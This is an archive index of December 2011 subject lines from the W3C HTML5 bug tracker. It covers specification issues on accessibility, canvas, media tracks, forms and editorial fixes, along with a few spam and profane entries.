from December 2011 by subject

[Bug 10066] replace section 3.2.6 with the alternative spec text provided (ARIA)

[Bug 10198] The Gregorian is not a Universal standard for calendars. HTML5 must provide ways for other calendar types. e.g. The "Hijri" calendar is used throughout in Arab countries. The "Persian" calendar is used in Iran, Afghanistan and Pakistan. The "Hebrew" calen

[Bug 10249] Canvas requires a content selection method

[Bug 10631] Named access on the Window object doesn't work for XHTML documents in WebKit, Firefox, or (trivially) IE. Dumping objects in the global scope is sad face. Can we restrict this behavior to HTML documents? (The bug for implementing this in XHTML was rece

[Bug 10645] <dialog> Add support for in-page dialogs

[Bug 10645] Add a modal attribute to html5 to indicate a modal segment of the DOM (modal dialog)

[Bug 10671] consider adding support for PUT and DELETE as form methods

[Bug 10713] Drag and Drop: Add guidance for keyboard-only interaction

[Bug 10774] fallback for accesskey insufficiently defined

[Bug 10824] i18n comment 20 : list item marker display and position

[Bug 10829] i18n comment : ruby code samples

[Bug 10829] Remove the whitespace from the <rp> example

[Bug 10830] i18n comment : Please add support for rb

[Bug 10853] HTML5 lacks a verbose description mechanism

[Bug 10919] Allow role="presentation" to override the default role of any element

[Bug 10975] from gmail, JimJJewett said: Audio and Video should show the fallback content (for older browsers) if they do not understand the codec -- even if they understand video (or audio) itself

[Bug 11004] Add an example of suggestion labels being used and rendered for input type="range"

[Bug 11124] consider reducing verbosity when talking about code points

[Bug 11240] Canvas support accessible selection position tracking independent of Focus Ring tracking

[Bug 11482] WF2: Change accept="" to accept file extensions as well as MIME types (maybe based on whether they start with a period)

[Bug 11486] Remove rel=archives in favor of rel=index. They are extremely similar and not that useful to have separately.

[Bug 11557] Authors should not be allowed to specify roles on elements that they already have by default

[Bug 11956] restrict use of role=presentation

[Bug 12133] references scroll event, but never fires

[Bug 12228] All Media Elements should have the ability to have both short and longer textual descriptions associated to the element.

[Bug 12243] Conformance of aria-describedby="" and aria-labelledby="" attributes pointing to interactive content

[Bug 12306] "When authors use the canvas element, they must also provide content that, when presented to the user, conveys essentially the same function or purpose as the bitmap canvas." While everyone can probably agree that alternative content is a good idea when f

[Bug 12334] make <a name> valid again in HTML5

[Bug 12365] Add @fullsize to <img>

[Bug 12393] Add "allow-popups" for iframe@sandbox

[Bug 12399] <video> add bytesReceived, downloadTime, and networkWaitTime metrics

[Bug 12409] WF3: Automatic capitalization in input fields

[Bug 12410] fillText needs stricter definitions so that it's 100% uniform

[Bug 12417] HTML5 is missing attribute for specifying translatability of content

[Bug 12490] potential conflict between Link: and <link> semantics

[Bug 12531] Make it possible for <select multiple> to shrink wrap, within a min/max height range set as multiples of row height

[Bug 12539] The numeric references to produce the gyphs in the third column should use the characters listed in the second columns. lang (and aliases) list (correctly) U+27ea, but the glyph is produced by #9001 (U+2329) which is not in normal form C and generates va

[Bug 12543] [URL] Replacing backslash with forward slash in URIs doesn't seem to be necessitated by web compat

[Bug 12544] <video> MEDIA CONTROLLER requires track kind for in-band tracks

[Bug 12547] <video> Expose the /most recently reported readiness state/ as MediaController.readyState

[Bug 12561] Add the @action in the <form> so that there is a way to submit to the same page

[Bug 12586] Suggest using Typed Array for ImageData pixels. Add a new 'buffer' attribute that references ArrayBuffer of the pixel data. Convert 'data' (CanvasPixelArray) to Uint8Array view of 'buffer'.

[Bug 12590] @role=presentation for IMG should also require that @title is empty

[Bug 12662] <video> Add a section with suggestions for the 'chapters' text track kind, demonstrating how nested time ranges can be used for hierarchical chapters.

[Bug 12687] Constructing the form data set - for input type image

[Bug 12702] no obvious mapping for figure and figcaption elements

[Bug 12705] setTransform spec silent on what to do with singular matrices

[Bug 12708] @accesskey: Clarify what it needs in order to have effect

[Bug 12710] @accesskey: Authoring conformance - reliance on @tabindex et cetera

[Bug 12715] When used to include data blocks (as opposed to scripts), the data must be embedded inline

[Bug 12735]'s replace parameter doesn't seem to be implemented in at least Gecko and WebKit

[Bug 12794] <video> Add a non-normative note on how to provide text alternatives for media elements

[Bug 12834] Allow LEGEND element to be wrapped in DIV

[Bug 12834] Allow wrapping LEGEND (or new iLEGEND) in non-FIELDSET elements

[Bug 12834] LEGEND should be allowed to NOT be exactly first child of FIELDSET ("The legend element" spec section)

[Bug 12834] Provide a way for authors to have their fieldset legends not straddle the fieldset border

[Bug 12839] @id: Define how Unicode normalization affects the 'unique identifier' status

[Bug 12854] I am quite surprised to see that things such as the list of allowed values for the "rel" attribute of the "link" tag (aka. the list of link types) as well as the list of allowed values for the "name" attribute of the "meta" tag are supposed to be listed o

[Bug 12874] question on use of image maps

[Bug 12877] remove section 3.11

[Bug 12885] WF3: Provide a way for the author to specify what kind of keyboard behaviour to use for text inputs on multimodal keyboards (e.g. show the numeric keyboard, capitalise the first character by default, etc)

[Bug 12897] In some parsers, UTF-8 BOM trumps the HTTP charset attribute (Encoding sniffing algorithm)

[Bug 12920] Move caretBlinkRate from canvas context to a navigator interface

[Bug 12921] Make caretBlinkRate a property not a method

[Bug 12922] Allow privacy exemption for caretBlinkRate

[Bug 12943] Drop progress.position IDL or make it settable

[Bug 12964] <video>: Declarative linking of full-text transcripts to video and audio elements

[Bug 12984] Contributions to HTML5: Techniques for providing useful text alternatives

[Bug 12995] PUB: Need to enable automatic cross-spec references somehow

[Bug 13030] it looks to me boolean is the right type for the 4th parameter 'replace' in the open operation as open in HTMLDocument.

[Bug 13057] Remove INS and DEL elements in favor of a new set of attributes

[Bug 13062] HTML spec should not dictate first/last child nesting level and exact order of child siblings

[Bug 13067] Password hashing

[Bug 13085] Enhancement: Set component for whole image?

[Bug 13096] Enhancement: Set only single component for each pixel

[Bug 13096] Enhancement: Set single component for pixel

[Bug 13098] Clarify whether <wbr> has the same effect as the zero-width space character

[Bug 13113] Parsing algorithm should not preclude Complex Ruby

[Bug 13129] Accessible Tables examples in HTML 5 spec

[Bug 13137] HTML 5 table spec tables samples contain no ARIA markup example.

[Bug 13138] DOM Core: set concept-document-media-type

[Bug 13142] Typo: "even when the response do include a recognized challenge" "do" -> "does"

[Bug 13176] The bounds of canvas fallback content, as rendered on the canvas, are not provided by the user agent to an assistive technology.

[Bug 13181] Canvas does not allow mouse events to be directed to keyboard accessible objects in fallback content

[Bug 13226] missing interfaces from interfaces index

[Bug 13226] Rename "Interfaces" index section to more precise "Element interfaces"

[Bug 13228] xref "content model" and maybe some of the other boilerplate terms in the lead, so the meaning is clearer. See bug 13224 for someone who didn't understand what it meant.

[Bug 13235] missing events from event enumerations

[Bug 13236] missing events from event index

[Bug 13239] Add support for in-page dialogs

[Bug 13240] Consider replacing <time> with <data>

[Bug 13252] possible inconsistent exposure of event attributes

[Bug 13256] missing event handler content attributes from attributes index

[Bug 13291] it doesn't make sense for <button> to be exposed as a link or radio button; it would just confuse users told to "click the button"

[Bug 13319] Script errors should provide column position

[Bug 13319] Script errors should provide column position (add a fourth argument to onerror handler)

[Bug 13329] The muted attribute is valid and has effect also on <audio>

[Bug 13348] I was wondering if it would be possible to extend the iframe sandbox attribute to provide additional functionality. We've been developing a HTML5 digital signage solution where the playback application is a HTML5 web page. When the solution is displaying

[Bug 13357] <video>: Additional AudioTrack.kind categories are needed to identify tracks where audio descriptions are premixed with main dialogue.

[Bug 13359] <track> A way is needed to identify the type of data in a track element

[Bug 13359] A way is needed to identify the type of data in a track element

[Bug 13408] UA should use element locale for i18n

[Bug 13409] Defining Entity references for characters in XHTML.

[Bug 13428] Remove Requirements for providing text to act as an alternative for images

[Bug 13429] Section 7.5 contenteditable and designMode must make navigation consistent platform conventions

[Bug 13432] <video> In the description of accessibility features, call out those with reduced faculties separately from those with disabilities, to avoid offending the elderly

[Bug 13436] Editorial changes to The Video element (4 of 5)

[Bug 13447] SVG content model VENN diagram needs to be made accessible [ Kinds of content/content-venn.svg].

[Bug 13461] Commentary on Issue #30 (longdesc) from the Association of American Publishers

[Bug 13462] The spec doesn't make it clear what should happen to pending timeouts/intervals on the old Window

[Bug 13479] Document conformance/validity has to be stable over the time

[Bug 13511] document parsing should discuss setting up accessibility APIs

[Bug 13514] Support different resolutions for command elements and images

[Bug 13520] Drag and Drop without a pointing device

[Bug 13528] Many examples in the forms section to do not exemplify best practice

[Bug 13530] example in 4.10.1 has unneeded <p> around form elements

[Bug 13532] Clarify that UAs should make user-accessible all elements that take focus or react to user input, regardless of the input method

[Bug 13532] Sequential navigation to all elements that take focus or input

[Bug 13539] Specify reading and navigation order

[Bug 13547] overloading of input element is confusing

[Bug 13548] size, width and height attributes on input should be conforming but obsolete

[Bug 13549] 4.10.18 associating form elements with forms that do not contain them can cause navigation problems for AT and keyboard users

[Bug 13550] type table in 4.10.7 should indicate control type changes based on list attribute

[Bug 13551] clarify definition of "value sanitization algorithm"

[Bug 13554] 4.10.7 please specify all cases where readonly attribute makes the input immutable

[Bug 13555] Fixing keyboard shortcuts and commands

[Bug 13558] input type=email should support friendly names

[Bug 13563] radio and checkbox elements should not be valid without an associated label

[Bug 13567] definition of @alt on input type image needs a rewrite

[Bug 13567] Fix typos in definition of <input type=image alt="">

[Bug 13568] use of "accessible" to refer to placement of UI controls is confusing

[Bug 13569] Allow user agents to override autocomplete

[Bug 13570] why does input type=color support autocomplete?

[Bug 13571] user agent MUST allow user to activate the button

[Bug 13572] 4.10.19 aborting autofocus based on user choice not optional

[Bug 13574] Accessibility API support for dropzone

[Bug 13577] ISSUE-118 CP 3, rel="start" and friends, rant

[Bug 13578] Argument for the approval of adding setElementPath to the Canvas 2d specification.

[Bug 13579] Clarify behavior of accesskey on static content elements

[Bug 13590] VHA Comments on HTML5 Draft Specification

[Bug 13591] Keyboard-only drag and drop must be fully supported

[Bug 13594] Handling of duplicate keyboard shortcuts

[Bug 13603] Web Origin Concept

[Bug 13608] Add <menuitem> element

[Bug 13614] Define <th abbr=""> as a way to provide a name for a row/column that is used when describing cells for which that cell is a header

[Bug 13614] Do not obsolete abbr on TH and TD

[Bug 13616] Allow specifying categories/keywords for commands

[Bug 13625] There is no way to pass audio and video content metadata to the user agent that is required in some cases for playback.

[Bug 13626] Facilitate grouping of menu items

[Bug 13630] Better method for user-friendly help or hints

[Bug 13635] Feedback on Various Input Types and Attributes

[Bug 13637] <track> Cue rendering+behavior spec text should generic, not webvtt-derived

[Bug 13638] Consider referencing User Agent Guidelines in section Implicit submissions

[Bug 13641] Please provide a Glossary of Terms

[Bug 13645] Reference section 12.1 'text/html' of HTML5 instead of RFC 3236

[Bug 13651] Missing alt should not be considered conforming in the presence of figcaptions over 50 words in length.

[Bug 13654] 3.5.1 does unregistering event listeners include AT?

[Bug 13655] Support for viewports and positions

[Bug 13657] exact number not imporant in range doesn't make sense.

[Bug 13660] 4.8.2 unload behavior of iframes seems risky

[Bug 13661] 4.8.2 Will iframe loading events break existing AT?

[Bug 13664] what events are fired when iframe seemless attribute is changed dynamically?

[Bug 13665] Need to define model for focus order and how to keyboard out of frame

[Bug 13667] Title attribute is overloaded

[Bug 13668] Generated content must be accessible

[Bug 13693] CSS WG HTML5 Last Call Comments

[Bug 13698] Three minor comments

[Bug 13699] Update CanvasPixelArray tests for clamping

[Bug 13704] Re: The li element (the value attribute) What (other than compatibility with pre-html5 user agents) is the rationale for limiting the value attribute to an integer? The value attribute should be interpreted by user agents as a hint to the user agent about

[Bug 13706] [html5] Scoped style sheets

[Bug 13711] [html5] Alternative style sheet handling undefined

[Bug 13714] "The initial offer must include": Add RFC4733's "named telephone events" audio codec to the first audio stream or add an audio stream with just that codec if there isn't one already. Add that codec to all audio streams added with addStream(). Add an API t

[Bug 13720] remove reference to draft-hoehrmann-javascript-scheme ([JSURL])

[Bug 13727] regarding "phrase or paragraph with an alternative graphical representation"

[Bug 13728] on guidance for conformance checkers about text alternatives

[Bug 13731] need simple visual alternatives to indicate that audio is playing to let a deaf user know

[Bug 13732] canvas accessibility

[Bug 13737] the menu element and accessibility

[Bug 13769] WF3: Add trim="" attribute to <input type=text/search> that strips leading and trailing whitespace from the value

[Bug 13790] Rename localStreams and remoteStreams to sendStreams and receiveStreams or similar since you may send a stream that is received from one peer to another and then it ends up in localStreams (although it's not local)

[Bug 13791] Rename SignalingCallback interface to PeerConnectionSignalingCallback for consistency

[Bug 13849] Refresh: HTTP header field should be defined for completeness

[Bug 13851] Title:Semantics, structure, and APIs of HTML documents. About the new Html 5 tags i have some confusion. If the new tags just has semantic meaning than what is the point of including too many tags in the new html version. Its like the browser wars all ove

[Bug 13883] Index of methods and IDL attributes

[Bug 13895] To clarify -- on getting, does the setter preprocessor still need to be run? I.e. if the input is "", should port be 0, 65535, or 99999?

[Bug 13904] "web+" URI scheme prefix

[Bug 13921] meta-tag in HTML5 and validation

[Bug 13942] Allow @autofocus on any element with @tabindex

[Bug 13961] I'm concerned there doesn't seem to be an elegant simple way to provide closed captions for the <video> tag. YouTube does this quite well(albiet in another technology), just upload the SMIL or whatever captioning text file and link it to the video. I thi

[Bug 14028] remove unused "CSS element reference identifier" term

[Bug 14030] non-well-formed requirement regarding DOMRANGE, DOMPARSING, ...

[Bug 14031] missing reference to HTML Canvas 2D Context

[Bug 14073] Define role of @title in <a title="Expansion"><abbr>abbrevitation</abbr></a>

[Bug 14087] Return sections of HTML5 that were removed outside of the W3C

[Bug 14104] <track> Live captioning

[Bug 14107] Non-conformance of the summary attribute for the table element makes WCAG 1.0 compliance impossible

[Bug 14109] Stop and start media buffering

[Bug 14114] HTML+RDFa should extend flow content to include link and meta elements

[Bug 14153] This defeats the entire purpose of separating style and content. Style scoping works quite well using the CSS cascade

[Bug 14202] Add 'update' boolean attribute to TIME element

[Bug 14210] Reflecting href with a URL that doesn't resolve doesn't return the empty string in browsers (at least opera/moz, don't know what URL would fail to resolve in webkit). Instead it returns the value without resolving.

[Bug 14213] missing transitive dependencies - NodeIterator, Range, TreeWalker

[Bug 14235] >10 Rendering >10.5 Bindings >10.5.15 textarea element >If the element has a rows attribute, ... >Otherwise, the user agent is expected to act as if it had a user-agent-level style sheet rule setting the 'height' property on the element to the textarea ef

[Bug 14275] This non-normative box is not very clean. After all, using DOM methods or innerHTML also could make DOM not correspond source code of document (heck, older versions of IE did some transformations). Also, as long you won't use async or defer I cannot think

[Bug 14353] Can an example for scripts of interactive works, like video games, be added? In those, dialogue is often triggered by pressing a button near them, and it's divided into chunks. Like person A may say X the first time, but if you query the person again (s)

[Bug 14358] <track> and WebVTT cue.alignment need more values

[Bug 14360] Count Unicode 'combining marks" together with "inter-element whitespace"

[Bug 14363] Update the registration mechanisms

[Bug 14364] appcache: Add an API to make appcache support caching specific URLs dynamically

[Bug 14419] when canvas isn't supported, or for blind users, the canvas element's content should be displayed, so excluding input types like text and select is discriminatory

[Bug 14429] Named references: Point out HTML5's deviations from HTML4

[Bug 14430] Incorrect or inconsistent glyph values for &rang; and &lang;

[Bug 14470] Microdata: Language handling

[Bug 14486] Should list items really be allowed to contain headings? If so, should list items be made sectioning roots or similar?

[Bug 14486] Should the conten model relly be Floww Content? Do we, for example, really want headings embeded in lists?

[Bug 14514] A 44 byte header seems excessive. Consider that for a modern speech codec like Speex, a 20ms payload may only be 10 bytes. Even bundling 80ms together, the header will be larger than the payload.

[Bug 14526] WF2: When adding filenames to the data set, should there be normalization of decomposed forms?

[Bug 14540] what about if the <body> IS an article?

[Bug 14552] <track> Add comment block support

[Bug 14569] URL object should not return DOMTokenList

[Bug 14575] <track> Spec is confused about which edge the text position starts from

[Bug 14579] Add ellipse support to canvas

[Bug 14596] Microdata: validity contraints to catch missing attributes

[Bug 14646] <track> Don't use one-letter settings. They are non-intuitive and hard to remember. It makes little sense to use a single letter for the setting but then a sensible string for the value. Please use "align" instead of "A", etc.

[Bug 14689] xml-stylesheet with type=text/xsl needs to be handled explicitly

[Bug 14693] \ rewriting in URLs never happens?

[Bug 14701] appcache: remove the requirement for the MIME type

[Bug 14702] appcache: always up-to-date applications

[Bug 14703] CSSOM defines algorithms named "create a style sheet" and various other similar ones. These need to be explicitly invoked somehow so that <link rel=stylesheet> elements correctly contribute to document.styleSheets.

[Bug 14704] appcache: allow a manifest to be identified by something other than its URL

[Bug 14705] appcache: SOP requirement for cache manifest files should be relaxed (at least) by CORS.

[Bug 14707] "For the purposes of document summaries, outlines, and the like," should be treated as a UI issue, and should not be restricted in what text to use. It is e.g. resonable to join the headings with ": " if the hgroup is used for heading+subheading.

[Bug 14738] Please add more canvas examples

[Bug 14740] title attribute definition does not match reality

[Bug 14748] inconsistent treatment of transitive dependencies - typed arrays

[Bug 14750] Clarify what the origin of the new document is if the document is blown away (consider if the old document set document.domain)

[Bug 14762] Rename all callbackInterface.handleEvent methods to something which describes what the method is about

[Bug 14793] For Time, if HTML5 can handle time zone effectively. For example if there a web page showing that the football game starts at 6:00pm. One has to understand, it is not local time. It could be 6:00pm ET (Easter US Time). But if you are see that page in Cent

[Bug 14801] Unit of Measure (UOM) support; If HTML can make a tag with well know units of measure, like miles, pounds, grams, etc as first class attribute types. For example, if there a tag like <uom type="pounds">100</uom> where we want to show "100 lbs" on screen.

[Bug 14810] First content model definition of <canvas> should get removed (1. Transparent 2. Transparent, but…), if the but always applies.

[Bug 14810] First content model definition of <canvas> should get removed (1. Transparent 2. Transparent, but…), if the but always applies.

[Bug 14811] no description shows

[Bug 14812] NAT Traversal

[Bug 14815] Something for stay on the audio or video after reload or change the page on the same domain.

[Bug 14816] It should be possible to reverse the direction of a vertical slider as well as a horizontal one, by using 'direction: rtl' or another property, so the lowest value can be at the top instead.

[Bug 14817] Support RIFF WAVE PCM as a baseline audio codec

[Bug 14818] PeerConnection API is available elsewhere <> so this text should be fixed

[Bug 14832] Check whether the encoding problems for query components applies to mailto: URLs and other non-HTTP URLs and see if we can change the definition of "valid URL" accordingly

[Bug 14833] "If current node is a pre, textarea, or listing element, append a U+000A LINE FEED (LF) character." - no browser does this and when we tried it caused site-compat problems. It should either be removed or changed to only emit a extra LF if the element's fi

[Bug 14835] Typo: s/tat/that/ or s/tat/the/ in DOM

[Bug 14836] The title should read "User Agent Accessibility Guidelines" instead.

[Bug 14837] the area-elements in the example should have shape-attributes or no coords

[Bug 14844] This specification prevents a single document, relying on no outside content, from converting an in-document SVG to a PNG. See

[Bug 14845] For editorial consistency, "noshade" should link to attr-hr-noshade (the definition exists). And why is the @title attr-input-noshade by the way?

[Bug 14850] make unicode-bidi:isolate default for flow elements with a dir attribute too

[Bug 14851] <video> Add seek() function for non-exact (fast) seeking

[Bug 14853] The variable 'node' in the example function 'processClick' is never defined anywhere

[Bug 14859] Don't mention CDATASection nodes here

[Bug 14870] autosubmit attribute for form elements

[Bug 14879] You should remove named numeric constants from interfaces that don't have legacy constraints yet. These probably include some or all of: HTMLTrackElement, TextTrack, NavigatorUserMediaError, MediaStream, PeerConnection, EventSource.

[Bug 14884] Proposing a page including system

[Bug 14889] For input.valueAsNumber In the non-normative box, "otherwise, returns null" should read "otherwise, returns NaN".

[Bug 14890] For invalid Date, the terminology here seems to be "undefined" insted of "null" according to WebIDL, and the ECMAScript "null" value should never reach here according to the IDL description of attribute "valueAsDate". For readiblity, I suggest we just s/i

[Bug 14891] FileCallback interface undefined and not referenced as external dependency

[Bug 14895] MouseEventInit not defined by [DOMEVENTS] (DOM-3 Events)

[Bug 14896] UIEvent referenced by not used

[Bug 14902] does the worker is destroyed if the html page is changed?

[Bug 14903] does the worker is destroyed if the html page is changed?

[Bug 14906] consider to add event "dragActivate" to the spec

[Bug 14907] It looks like you can pass the return value of setInterval to clearTimeout

[Bug 14908] It's not clear to me if the "if the time-zone offset is not zero" clause here affects authoring conformance or not. FWIW, treats <input type=datetime value=0001-01-01T00:00:00-00:00> as valid. Also, the term "best representation of the global

[Bug 14910] Security: Can't a web page that calls window.stop() 1000 times a second prevent a user from leaving a page?

[Bug 14911] provide a way to make UAs' ":visited" pseudo-state's behavior more consistent

[Bug 14912] From MediaStreamEventInit: DOMString MediaStream? stream; This fails to parse. Presumably the "DOMString" isn't meant to be there?

[Bug 14914] This IDL doesn't parse. These IDL members are already in HTMLInputElement and HTMLTextAreaElement -- why do they need to be repeated here in a separate IDL fragment?

[Bug 14915] "partial interface URL", but there's no URL interface defined anywhere else.

[Bug 14918] (editorial) The name attribute links to the wrong thing (attr-input-value). Should be attr-fe-name instead.

[Bug 14919] Another demo including Paul's:

[Bug 14923] test

[Bug 14926] Should not the tittle be susceptible to style?

[Bug 14929] <track> use the same names in the DOM API as in WebVTT's cue settings

[Bug 14935] An absolute URI not IRI

[Bug 14937] Replace poor coding example for figure with multiple images

[Bug 14947] Is the placeholder attribute only allowed on textual fields? If not, is there a specific way UAs are expected to show the value on non-textual fields?

[Bug 14954] <track> Step 1 should be "A WebVTT cue span start tag "ruby". to coincide with Step 5.

[Bug 14970] <video> Expose statistics for tracking playback quality (framerate information)

[Bug 14992] The table at (8.5 Named character references) uses the U+XXXXX notation (with 5 digits) to indicate codepoints. The usual convention is to use U+XXXX for BMP characters (i.e. U+0000 - U+FFFF), an

[Bug 14993] The list of named character references at (8.5 Named character references) should also be available in an easy-to-parse format (e.g. plain text or json). This will allow developers to use it with

[Bug 15000] Don't fire load until the image is fully decodable. If the image is corrupt or unsupported, the spec says to fire load *and* error, but browsers don't do that.

[Bug 15002] Clarify status of initial newline in <pre> and <textarea>

[Bug 15004] Clarify status of initial newline in <pre> and <textarea>

[Bug 15005] Clarify what "immediately precedes" means here, in particularly I don't think that would include previous <rt> element.

[Bug 15006] Sample document as displayed is not well-formed XML

[Bug 15007] Add an API to queue a task

[Bug 15020] I want to ask: This is based in the XHTML 1.x Strict standart??? or... This is based in the HTML 4.01 Strict standart??? or... This is a new reformulation in the markup language and all oldest (XHTML and HTML4.01)language will be incompatible??? I'm sorry

[Bug 15023] New: WebVTT v2: Add inline style support

[Bug 15023] WebVTT v2: Add inline style support

[Bug 15024] New: WebVTT v2: Add default settings support

[Bug 15024] WebVTT v2: Add default settings support

[Bug 15025] New: “This flag's othe value is months” should be “This flag's other value is months” (note “r” at end of “other”)

[Bug 15025] “This flag's othe value is months” should be “This flag's other value is months” (note “r” at end of “other”)

[Bug 15026] Need a mechanism to draw elliptical arcs. Once available this can be extended to draw an ellipse. 1. Current methods of drawing them with beziers/quadratic curves do not work well and are approximations. 2. Using arcto/arc followed by scaling distorts the

[Bug 15026] New: Need a mechanism to draw elliptical arcs. Once available this can be extended to draw an ellipse. 1. Current methods of drawing them with beziers/quadratic curves do not work well and are approximations. 2. Using arcto/arc followed by scaling distorts the

[Bug 15027] "No Character encoding declared at document level No character encoding information was found within the doc

[Bug 15027] New: "No Character encoding declared at document level No character encoding information was found within the doc

[Bug 15031] MediaController: Event handler 'ontimeupdate' has event type 'durationchange' instead of 'timeupdate'

[Bug 15031] New: MediaController: Event handler 'ontimeupdate' has event type 'durationchange' instead of 'timeupdate'

[Bug 15032] <track> Use 'after' (not 'before') to describe cue list creation algorithm.

[Bug 15032] New: Use 'after' (not 'before') to describe cue list creation algorithm.

[Bug 15033] New: seamless="" should also make media queries get evaluated against the nearest ancestor non-seamless browsing context. See

[Bug 15033] seamless="" should also make media queries get evaluated against the nearest ancestor non-seamless browsing context. See

[Bug 15035] "the height of the bounding box around the content" is not precise enough. Does it include floats? Absolutely positioned elements? Fixed positioned elements? (If so, how.) Box shadows and other visual effects?

[Bug 15035] New: "the height of the bounding box around the content" is not precise enough. Does it include floats? Absolutely positioned elements? Fixed positioned elements? (If so, how.) Box shadows and other visual effects?

[Bug 15036] If you want people to try using the CSS table model, you should probably link to a document about that

[Bug 15036] New: If you want people to try using the CSS table model, you should probably link to a document about that

[Bug 15037] don't give a shit fuckers, all you post here is piece of bullshit. greetings from poland, kurwa.

[Bug 15037] New: don't give a shit fuckers, all you post here is piece of bullshit. greetings from poland, kurwa.

[Bug 15038] don't give a shit fuckers, all you post here is piece of bullshit. greetings from poland, kurwa.

[Bug 15038] New: don't give a shit fuckers, all you post here is piece of bullshit. greetings from poland, kurwa.

[Bug 15039] don't give a shit fuckers, all you post here is piece of bullshit. greetings from poland, kurwa.

[Bug 15039] New: don't give a shit fuckers, all you post here is piece of bullshit. greetings from poland, kurwa.

[Bug 15040] don't give a shit fuckers, all you post here is piece of bullshit. greetings from poland, kurwa.

[Bug 15040] New: don't give a shit fuckers, all you post here is piece of bullshit. greetings from poland, kurwa.

[Bug 15041] Clarify dimensions of image returned by Canvas toDataURL

[Bug 15041] New: Clarify dimensions of image returned by Canvas toDataURL

[Bug 15042] New: Canvas test toDataURL.png.primarycolours.html fails with high resolution backing store.

[Bug 15045] "initial empty" -> "initially empty"

[Bug 15045] New: "initial empty" -> "initially empty"

[Bug 15046] its showing msg that i am reading r6837 while the latest version is r6840, how can i switch to latest one

[Bug 15046] New: its showing msg that i am reading r6837 while the latest version is r6840, how can i switch to latest one

[Bug 15047] Common microsyntaxes parsing rules allow non-numeric trailing characters

[Bug 15047] New: Common microsyntaxes parsing rules allow non-numeric trailing characters

[Bug 15048] Correct br element rule in user agent stylesheet

[Bug 15048] New: Correct br element rule in user agent stylesheet

[Bug 15049] New: The description of opener doesn't say what the value is if any of the listed conditions do not hold. I think null is the correct value for windows with no opener, but the IDL lists its type as WindowProxy instead of WindowProxy?, which would seem to indic

[Bug 15049] The description of opener doesn't say what the value is if any of the listed conditions do not hold. I think null is the correct value for windows with no opener, but the IDL lists its type as WindowProxy instead of WindowProxy?, which would seem to indic

[Bug 15051] i HHHHHATE this bar at the bottom. even my "rip" firefox addon cannot remove it. now i have to hardcode "remove js" into privoxy. Put an option "show edit bar" at the very top, omg, you wannbe w3c.

[Bug 15051] New: i HHHHHATE this bar at the bottom. even my "rip" firefox addon cannot remove it. now i have to hardcode "remove js" into privoxy. Put an option "show edit bar" at the very top, omg, you wannbe w3c.

[Bug 15054] New Feature Suggestion: This is a completely new and unheard problem. Today I was developing a new page with a music player on it. However, when you click on a link and another page loads, the player resets and starts the song all over again. Is it possib

[Bug 15054] New: New Feature Suggestion: This is a completely new and unheard problem. Today I was developing a new page with a music player on it. However, when you click on a link and another page loads, the player resets and starts the song all over again. Is it possib

[Bug 15056] New: Three suggestions to HTML5

[Bug 15056] Three suggestions to HTML5

[Bug 15057] New: The [webvtt] reference has a [webworkers] label

[Bug 15057] The [webvtt] reference has a [webworkers] label

[Bug 15063] each MessageChannel acts as its own task source. This means that messages sent using this function are not guaranteed to execute in order, since the order task sources are processed isn't specified.

[Bug 15063] New: each MessageChannel acts as its own task source. This means that messages sent using this function are not guaranteed to execute in order, since the order task sources are processed isn't specified.

[Bug 15064] New: Please enter a description of the problem you have found, and then submit the comment again.

[Bug 15064] Please enter a description of the problem you have found, and then submit the comment again.

[Bug 15076] Make UAs use UTF-8 as fallback encoding if the page has a HTML5 doctype

[Bug 15076] New: Make UAs use UTF-8 as fallback encoding if the page has a HTML5 doctype

[Bug 15080] Hi I was wondering if / when some sort of implementation of a "capture" tag would be introduced. Removing the need to add extra third party code or writing your own "capture" system. Surely this would be a good addition to the spec, it would mean less spa

[Bug 15080] New: Hi I was wondering if / when some sort of implementation of a "capture" tag would be introduced. Removing the need to add extra third party code or writing your own "capture" system. Surely this would be a good addition to the spec, it would mean less spa

[Bug 15081] Hi I was wondering if / when some sort of implementation of a "capture" tag would be introduced. Removing the need to add extra third party code or writing your own "capture" system. Surely this would be a good addition to the spec, it would mean less spa

[Bug 15081] New: Hi I was wondering if / when some sort of implementation of a "capture" tag would be introduced. Removing the need to add extra third party code or writing your own "capture" system. Surely this would be a good addition to the spec, it would mean less spa

[Bug 15082] New: rp should always represent nothing

[Bug 15082] rp should always represent nothing

[Bug 15095] Allow data: URL for new Worker(). Supported by Opera and Firefox.

[Bug 15095] New: Allow data: URL for new Worker(). Supported by Opera and Firefox.

[Bug 15098] New: some one enter my computer is inteligent asking for money and i tried to remove more than 100 times and could not can you help please!

[Bug 15098] some one enter my computer is inteligent asking for money and i tried to remove more than 100 times and could not can you help please!

[Bug 15100] New: § 4.9 Today, right-aligning a numeric table column is much more work than it should be. Most browsers honor the alignment specified for the col element, but Mozilla seems to have drawn a line in the sand, claiming the HTML standard and the CSS standard c

[Bug 15100] Right-aligning a numeric table column is much more work than it should be

[Bug 15103] New: why not kill this (i,b,u) element and force devices to allway use/can use css?

[Bug 15103] why not kill this (i,b,u) element and force devices to allway use/can use css?

[Bug 15108] getContext "return a new object for contextId" should handle the called algorithm throwing an exception, so TypeError can be thrown if converting "any..." arguments to a particular IDL type fails.

[Bug 15108] New: getContext "return a new object for contextId" should handle the called algorithm throwing an exception, so TypeError can be thrown if converting "any..." arguments to a particular IDL type fails.

[Bug 15109] asd fdsdadsa badfa

[Bug 15109] New: asd fdsdadsa badfa

[Bug 15110] New: Non Gregorian Calendars needs to be supported in the date/datetime input

[Bug 15110] Non Gregorian Calendars needs to be supported in the date/datetime input

[Bug 15112] New: Videos from Mindlocator1 Youtube channel

[Bug 15112] Videos from Mindlocator1 Youtube channel

[Bug 15113] "Document" could have a pointer to the "Documents in the DOM" section (the partial Document interface) so that it's possible to find what was previously the HTMLDocument interface by following xrefs

[Bug 15113] New: "Document" could have a pointer to the "Documents in the DOM" section (the partial Document interface) so that it's possible to find what was previously the HTMLDocument interface by following xrefs

[Bug 15114] New: A "date-optional-state" should be available, for when the specifity of the date is unknown. This would give the user the option of selecting a year, month, or day. Any additional requirements (e.g. required month) can be taken care of with [pattern]. Woul

[Bug 15114] Proposed "date-optional-state" for <input>

[Bug 15115] Dear Sirs, How much more useful useful the <base href=""> tag would be if it could be nested. Full URLs would be unaffected, but partial paths could be concatenated. Could not a whole site then be rebased by changing the <base href="" for just the home pa

[Bug 15115] New: Dear Sirs, How much more useful useful the <base href=""> tag would be if it could be nested. Full URLs would be unaffected, but partial paths could be concatenated. Could not a whole site then be rebased by changing the <base href="" for just the home pa

[Bug 15117] New: Typo [WEBWORKERS] for WebVTT reference

